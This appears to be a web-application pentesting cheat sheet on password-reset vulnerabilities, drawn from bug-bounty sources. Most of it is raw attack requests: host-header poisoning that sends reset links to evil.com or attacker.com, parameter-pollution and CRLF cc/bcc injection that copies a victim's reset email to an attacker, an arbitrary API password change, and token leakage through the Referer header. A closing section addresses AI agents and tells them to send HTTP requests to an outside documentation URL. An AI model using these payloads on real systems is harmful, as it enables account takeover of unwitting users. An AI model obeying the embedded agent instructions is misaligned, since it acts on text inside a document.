# Password-reset

Main source:  [`https://sm4rty.medium.com/hunting-for-bugs-in-password-reset-feature-2021-3def1b391bef`](https://sm4rty.medium.com/hunting-for-bugs-in-password-reset-feature-2021-3def1b391bef)

And : <https://anugrahsr.github.io/posts/10-Password-reset-flaws/>

{% embed url="<https://book.hacktricks.xyz/pentesting-web/reset-password>" %}

## Exploit:

## 1. Token Leakage via Host Header Poisoning. <a href="#id-1aab" id="id-1aab"></a>

```
GET https://redacted.com/reset.php?email=foo@bar.com HTTP/1.1
host: evil.com
```

```
 Host: target.com
 X-Forwarded-Host: attacker.com
```

```
 Host: target.com
 Host: attacker.com
```

## 2. Sending an array of email addresses instead of a single email address. <a href="#id-353d" id="id-353d"></a>

```
{“email_address”:[“admin@breadcrumb.com”,”attacker@evil.com”]}
```

## 3.Password Reset By Manipulating Email Parameter:

```sh
POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
```

```sh
POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
```

```sh
POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
```

```sh
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
```

```sh
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
```

```sh
POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
```

```sh
POST /resetPassword
[...]
{"email":["victim@mail.tld","atracker@mail.tld"]}
```

## 4. Bruteforcing OTP for Reseting Password. <a href="#id-34e2" id="id-34e2"></a>

## 5. Password Reset Token Leak Via Referrer. <a href="#id-031c" id="id-031c"></a>

<pre><code><strong>1.Request password reset to your email address
</strong>2.Click on the password reset link
3.Dont change password
4.Click any 3rd party websites(eg: Facebook, twitter)
5.Intercept the request in burpsuite proxy
6.Check if the referer header is leaking password reset token.
</code></pre>

## 6. Response manipulation: Replace Bad Response With Good One <a href="#id-3ac2" id="id-3ac2"></a>

## 7.Changing Email And Password of any User through API Parameters

```sh
POST /api/changepass
[...]
("form": {"email":"victim@email.tld","password":"12345678"})
```

## 8.Using Attacker Token

```sh
POST /resetPassword
[...]
email=victim@email.com&code=$ATTACKER_TOKEN$
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://shahidulandshamim.gitbook.io/web-application/testing-process/password-reset.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.